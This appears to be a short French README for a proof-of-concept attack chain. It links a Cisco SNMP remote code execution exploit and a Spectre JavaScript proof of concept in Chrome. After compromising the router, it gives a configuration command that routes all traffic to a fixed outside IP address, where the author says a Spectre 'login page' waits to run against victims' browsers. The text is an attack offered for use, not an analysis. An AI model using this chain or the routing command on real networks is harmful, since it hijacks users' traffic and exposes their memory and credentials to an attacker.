
Une chaîne d'exploitation POC utilisant le récent exploit Cisco SMP (CVE-2017-6736) pour enchaîner sur Spectre (CVE-2017-5753 et CVE-2017-5715)
Un exploit PoC en chaîne utilisant le récent exploit Cisco SMP (CVE-2017-6736) pour enchaîner sur Spectre (CVE-2017-5753 et CVE-2017-5715)
Sous-module Cisco RCE Exploit par artkond : https://github.com/artkond/cisco-snmp-rce
POC JS Spectre Chrome par ascendr : https://github.com/ascendr/spectre-chrome
Testé sur un routeur Cisco 1841+2600.
Après avoir exécuté l'exploit RCE. Pour la configuration, exécutez :
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Cela forcera tout le trafic à passer par la page de connexion Spectre que j'ai créée. À une date ultérieure, j'ajouterai une meilleure version qui traitera le fait d'aller réellement sur les sites web.